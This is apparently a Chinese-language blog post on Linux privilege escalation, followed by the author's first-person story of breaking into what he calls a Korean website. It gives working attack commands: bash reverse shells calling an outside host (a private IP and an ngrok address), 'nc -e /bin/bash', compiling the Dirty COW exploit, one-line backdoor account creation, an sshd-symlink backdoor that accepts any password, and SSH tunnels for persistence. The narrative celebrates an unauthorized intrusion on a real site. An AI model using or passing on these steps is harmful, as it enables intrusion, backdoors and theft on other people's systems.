Linux提權思路

前言

首先關於Linux提權我們得先明白幾個概念。

linux發行版本

是我們常說的Linux作業系統，也即是由Linux核心與各種常用軟體的集合產品，全球大約有數百款的Linux系統版本，每個系統版本都有自己的特性和目標人群， 例如：

• CentOS
• redhat
• ubuntu
• kali

linux核心

Linux系統核心指的是一個由Linus Torvalds負責維護，提供硬體抽象層、硬碟及檔案系統控制及多工功能的系統核心程式。

linux核心版本的分類

Linux核心版本有兩種：穩定版和開發版 ，Linux核心版本號由3組數字組成：第一個組數字.第二組數字.第三組數字

第一個組數字：目前釋出的核心主版本。

第二個組數字：偶數表示穩定版本；奇數表示開發中版本。

第三個組數字：錯誤修補的次數。
 

正文

核心漏洞提權

說到核心提權就得提到髒牛了，這裡先放一放，講講常規思路。

檢視發行版本

cat /etc/issue
cat /etc/*-release

檢視核心版本

uname -a

[email protected]:~# uname -a
Linux kali 4.9.0-kali3-amd64 #1 SMP Debian 4.9.18-1kali1 (2017-04-04) x86_64 GNU/Linux

這樣我們就得到了系統的核心版本

可以用kali自帶的searchsploit來搜尋exploitdb中的漏洞利用程式碼

searchsploit linux Debian 4
 

 

反彈shell

如果手裡只有webshell可以利用反彈shell來得到一個shell

首先我們得有一個netcat

開啟本地監聽

# 開啟本地8080埠監聽，並將本地的bash釋出出去。
nc -lvvp 8080 -t -e /bin/bash

直接連線目標主機

nc 192.168.1.1 8000

bash直接反彈

bash一句話shell反彈：個人感覺最好用的用的方法就是使用的方法就是使用bash結合重定向方法的一句話，具體命令如下。

（1） bash反彈一句話

bash -i >& /dev/tcp/192.168.1.1/8080 0>&1
本地 nc -l -p 8080
 

（2）bash一句話命令詳解

以下針對常用的bash反彈一句話進行了拆分說明，具體內容如下。

其實以上bash反彈一句完整的解讀過程就是：

bash產生了一個互動環境與本地主機主動發起與目標主機8080埠建立的連線（即TCP 8080 會話連線）相結合，然後在重定向個tcp 8080會話連線，最後將使用者鍵盤輸入與使用者標準輸出相結合再次重定向給一個標準的輸出，即得到一個bash 反彈環境。

髒牛提權

利用gcc編譯dirty.c檔案

gcc -pthread dirty.c -o dirty -lcrypt 

反彈shell

python 一句話獲取標準shell

python -c "import pty;pty.spawn('/bin/bash')"

命令詳解：python 預設就包含有一個pty的標準庫

linux 一句話新增賬號

（1）chpasswd 方法

# useradd guest;echo 'guest:123456'|chpasswd

（2）useradd -p 方法

# useradd -p `openssl passwd 123456` guest

（3）echo -e 方法

# useradd test;echo -e "123456n123456n" |passwd test

內網穿透

沒有外網IP的我只能搞內網映射了

參考連結http://tieba.baidu.com/p/4604965053

註冊一個賬號設定好

./ngrok tcp 9999 

獲得一個公網地址

screen命令

語法

screen [zxsq-anti-bbcode--AmRvx -ls -wipe][zxsq-anti-bbcode--d <作業名稱>][zxsq-anti-bbcode--h <行數>][zxsq-anti-bbcode--r <作業名稱>][zxsq-anti-bbcode--s ][zxsq-anti-bbcode--S <作業名稱>]

選項

-A 　將所有的視窗都調整為目前終端機的大小。

-d <作業名稱> 　將指定的screen作業離線。

-h <行數> 　指定視窗的緩衝區行數。

-m 　即使目前已在作業中的screen作業，仍強制建立新的screen作業。

-r <作業名稱> 　恢復離線的screen作業。

-R 　先試圖恢復離線的作業。若找不到離線的作業，即建立新的screen作業。

-s 　指定建立新視窗時，所要執行的shell。

-S <作業名稱> 　指定screen作業的名稱。

-v 　顯示版本資訊。

-x 　恢復之前離線的screen作業。

-ls或--list 　顯示目前所有的screen作業。

-wipe 　檢查目前所有的screen作業，並刪除已經無法使用的screen作業。

常用screen引數

screen -S yourname -> 新建一個叫yourname的session

screen -ls -> 列出當前所有的session

screen -r yourname -> 回到yourname這個session

screen -d yourname -> 遠端detach某個session

screen -d -r yourname -> 結束當前session並回到yourname這個session

例子

#建立名稱為 ssh的回話

screen -S lego



#連線ngrok

./ngrok tcp 9999 



#退出到命令列

ctl+A+D



#查看回話

screen -ls



#登入到我剛剛建立的ssh

screen -r lego

ssh相關

Linux後門

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555; 

經典後門。直接對sshd建立軟連線，之後用任意密碼登入即可

ssh -o "StrictHostKeyChecking no" -o UserKnownHostsFile=/dev/null -T -fND 192.168.0.110:8888 [email protected] -o 31337

ssh -o "StrictHostKeyChecking no"  -T -fNR 8888:192.168.0.110:8888 [email protected]公網ip

我不是黑闊

前言

 

程式設計玩的在好,我也不能寫出完美的愛情

 

滲透玩的在強,我也不能提權進你的心

 

免殺玩的在狠,我也過不了你的主防禦

 

縱使我多麼的不可一世,也不是你的admin

 

會的再多又怎麼樣?沒有了你,我就是一無所有

正文

抗韓之路

身為一名黑闊，

總是會不進想起前輩們的中美黑客大戰。

物是人非事事休，

欲語淚先流。

想起那時候的一個個黑頁，

內心突然澎湃了起來。

放我出去，我要日站。

身為一名黑闊，我明白我的責任所在。

就在這時，我盯上了一個之前早已淪陷的站。

 

就在這一刻我明白，肩上扛負著什麼---抗韓從日站做起。

掛黑頁 脫褲子 已經滿足不了我了。

我需要的是你的所有。

提權

有了webshell之後，我看了一下我的許可權。

不夠不夠不夠。我需要的是你的root。

看發行版本，看核心。

原來是古物。

髒牛走起

提權成功。

但是由於菜刀的webshell並非是真實的shell，我無法切換到root使用者。

所以我要反彈shell出來。

內網對映

身為一名黑闊，突然發現我竟然連個外網IP都沒有。

在成為一名黑闊的路上，有條件要上，沒有條件創造條件也要上。

沒有外網就內網對映

我在https://ngrok.com/上註冊了一個賬號

ngrok啟動

反彈shell

bash -i >& /dev/tcp/0.tcp.ngrok.io/15234 0>&1

kali上   nc -l -p 9998

 

然後再獲得一個標準shell

python -c "import pty;pty.spawn('/bin/bash')"

切換到DarkHQ

看看許可權

這個時候我是SSH是連不上去的，因為他禁了root許可權登入ssh，所以我新建了一個使用者

即上面那句

useradd guest;echo 'guest:123456'|chpasswd

ssh連上普通賬戶

再切換到root賬戶